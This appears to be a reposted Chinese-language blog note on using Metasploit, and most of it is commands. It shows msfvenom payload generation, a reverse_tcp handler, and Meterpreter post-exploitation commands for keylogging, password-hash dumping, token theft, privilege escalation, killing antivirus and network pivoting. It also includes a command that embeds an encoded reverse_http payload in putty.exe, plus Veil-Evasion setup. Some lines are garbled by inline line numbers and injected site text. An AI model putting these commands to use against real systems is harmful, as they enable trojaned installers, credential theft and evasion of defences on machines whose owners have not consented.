Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。
Shell中直接输入msfconsole
启动PostgreSQL数据库服务 :service postgresql start 监听5432端口
初始化Metasploit数据库 :msfdb init
查看数据库联接情况 :msfconsole db_status
建立数据库缓存 :msfconsole db_rebuild_cache
|
|
Kali Linux /usr/share/metasploit-framework
|
|
msfvenom (攻击载荷生成和编码器)12345678910主要参数:-p payload-e 编码方式-i 编码次数-b 在生成的进程中避免出现的值LHOST,LPORT 监听上线的主机IP和端口-f exe 生成EXE格式使用msfvenom -l 可以查看可以利用payloadmsfvenom -l | grep windows | grep x64 | grep tcp 选择payload
|
|
|
|
|
|
123msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcpmsf exploit(handler) > show options
1234567msf exploit(handler) > set LHOST 172.16.0.4msf exploit(handler) &g 大专栏 Metasploit笔记t; set ExitOnSession falsemsf exploit(handler) > exploit -j -z -j(计划任务下进行攻击,后台) -z(攻击完成不遇会话交互)msf exploit(handler) > jobs 查看后台攻击任务 msf exploit(handler) > kill <id> 停止某后台攻击任务 msf exploit(handler) > sessions -l (查看会话)
12msf exploit(handler) > sessions -i 2 选择会话msf exploit(handler) > sessions -k 2 结束会话
12Ctrl+z 把会话放到后台Ctrl+c 结束会话
Meterpreter提供的功能包括反追踪、纯内存工作模式、系统 信息获取、密码哈希导出、文档上传下载、屏幕截取、键盘记 录、权限提升、跳板攻击等等。
常用命令:12345678910111213141516171819202122232425262728293031323334353637383940meterpreter > background 放回后台meterpreter > exit 关闭会话meterpreter > help 帮助信息meterpreter > Sysinfo 系统平台信息meterpreter > screenshot 屏幕截取meterpreter > shell 命令行shell (exit退出)meterpreter > getlwd 查看本地目录meterpreter > lcd 切换本地目录meterpreter > getwd 查看目录meterpreter > ls 查看文档目录列表meterpreter > cd 切换目录 meterpreter > rm 删除文档 meterpreter > download C:\Users\123\Desktop\1.txt 1.txt 下载文档meterpreter > upload /var/www/wce.exe wce.exe 上传文档meterpreter > search -d c: -f *.doc 搜索文档meterpreter > execute -f cmd.exe -i 执行进程/命令 meterpreter > ps 查看进程meterpreter > run post/windows/capture/keylog_recorder 键盘记录meterpreter > getuid 查看当前用户权限meterpreter > use priv 加载特权模块meterpreter > getsystem 提升到SYSTEM权限meterpreter > hashdump 导出密码散列meterpreter > ps 查看高权限用户PIDmeterpreter > steal_token <PID> 窃取令牌meterpreter > rev2self 恢复原来的令牌 meterpreter > migrate pid 迁移进程meterpreter > run killav 关闭杀毒软件 meterpreter > run getgui-e 启用远程桌面meterpreter > portfwd add -l 1234 -p 3389 -r <目标IP> 端口转发meterpreter > run get_local_subnets 获取内网网段信息meterpreter > run autoroute -s <内网网段> 创建自动路由meterpreter > run autoroute -p 查看自动路由表创建代理通道:msf > use auxiliary/server/socks4a 设置socks4代理模块msf auxiliary(socks4a) > show options msf auxiliary(socks4a) > run配置proxychains参数:nano /etc/proxychains.conf 修改代理监听端口,和前面端口一致quite_mode 设置成安静模式:去掉如下参数前面的注释
|
|
使用“putty.exe”作为文档模板,而且随着putty进程运行而隐蔽同时运行,还使用编码器进行了编码。1msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai-i5 -x ~/putty.exe -k -f exe -o /var/www/html/reverse_http_putty.exe
下载地址:
https://github.com/Veil-Framework/Veil-Evasion (只集合了Evasion)
https://github.com/Veil-Framework/Veil
安装:(建议使用git下载,否则无法更新)12345apt-get -y install gitgit clone https://github.com/Veil-Framework/Veil.gitcd Veil/cd setupsudo ./setup.sh -c
一路回车就行,可能中间或出现让你安装python、ruby、go语言等,默认安装就行
运行:12cd ~/Veil ./Veil.py
使用Veil-Evasion工具:
use Evasion
列举所有模块:
list
使用某个模块:
use
use c/meterpreter/rev_http.py
设置变量:
set
生成可执行代码:
generate
接着就是加载msf监听模块,等待用户的上线了。
msf功能还是十分强大的,是渗透必备神器,可以自定义渗透脚本,更新速度也挺快,这里只是简单记录了他的用法,还有更大的能力等待着各位去开发和挖掘,这个笔记也会在后期慢慢更新,增加新的技能,未完待续。。。
原文:https://www.cnblogs.com/lijianming180/p/12014232.html